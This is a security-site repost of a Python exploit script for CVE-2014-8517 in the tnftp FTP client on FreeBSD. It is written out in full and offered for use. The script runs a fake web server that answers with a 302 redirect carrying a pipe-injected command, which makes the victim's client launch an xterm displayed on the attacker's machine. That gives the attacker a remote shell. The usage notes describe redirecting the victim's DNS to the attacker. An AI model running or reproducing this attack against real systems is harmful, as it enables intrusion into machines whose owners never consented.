tnftp - clientside BSD Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

tnftp - clientside BSD Exploit

来源：dash@hack4.org 作者：dash 发布时间：2014-12-16

#!/usr/bin/env python2

#

# Exploit Title: [tnftp BSD exploit]

# Date: [11/29/2014]

# Exploit Author: [dash]

# Vendor Homepage: [www.freebsd.org]

# Version: [FreeBSD 8/9/10]

# Tested on: [FreeBSD 9.3]

# CVE : [CVE-2014-8517]

# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3

# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc

#

# 29 Nov 2014 by dash@hack4.org

#

# usage:

#

# redirect the vulnerable ftp client requests for http to your machine

#

# client will do something like:

# ftp http://ftp.freebsd.org/data.txt

#

# you will intercept the dns request and redirect victim to your fake webserver ip

#

# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1

# probably do also xhost+victimip

#

# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1

#

# sadly you cannot put a slash behind the | also www-encoded is not working

# plus problems with extra pipes

# this renders a lot of usefull commands useless

# so xterm -display it was ;)

#

# *dirty* *dirdy* *dyrdy* *shell* !

#

import os

import sys

import time

import socket

def usage():

print "CVE-2014-8517 tnftp exploit"

print "by dash@hack4.org in 29 Nov 2014"

print

print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])

print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])

#bind a fake webserver on 0.0.0.0 port 80

def webserveRedirect(redirect):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

s.bind(("0.0.0.0",80))

s.listen(3)

h, c = s.accept()

#wait for request

#print h.recv(1024)

#send 302

print "[+] Sending redirect :>"

h.send(redirect)

s.close()

return 0

#bind a fake webserver on port %rport

def deliverUgga(owned):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

s.bind(("0.0.0.0",rport))

s.listen(3)

h, c = s.accept()

# print h.recv(1024)

print "[+] Deliver some content (shell is spwaned now)"

h.send(owned)

s.close()

return 0

owned="""HTTP/1.1 200 Found

Date: Fri, 29 Nov 2014 1:00:03 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 5

Connection: close

Content-Type: text/html; charset=iso-8859-1

ugga ugga

"""

if(os.getuid())!=0:

print "[-] Sorry, you need root to bind port 80!"

sys.exit(1)

if len(sys.argv)<3:

usage()

sys.exit(1)

rip = sys.argv[1]

rport = int(sys.argv[2])

revip = sys.argv[3]

print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"

print "[+] Dont forget to run Xnest -ac :1"

# ok, lets use xterm -display

cmd = "xterm -display %s:1" % (revip)

cmd = cmd.replace(" ","%20")

print "[+] Payload: [%s]" % cmd

redirect = "HTTP/1.1 302\r\n"\

"Content-Type: text/html\r\n"\

"Connection: keep-alive\r\n"\

"Location: http://%s:%d/cgi-bin/|%s\r\n"\

"\r\n\r\n" % (rip,rport,cmd)

#child process owned data delivery

uggapid = os.fork()

if uggapid == 0:

uggapid = os.getpid()

deliverUgga(owned)

else:

#child proces for webserver redirect

webpid = os.fork()

if webpid == 0:

webpid = os.getpid()

webserveRedirect(redirect)

#childs, come home!

try:

os.waitpid(webpid,0)

except:

pass

try:

os.waitpid(uggapid,0)

except:

pass

#oh wait :>

time.sleep(5)

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告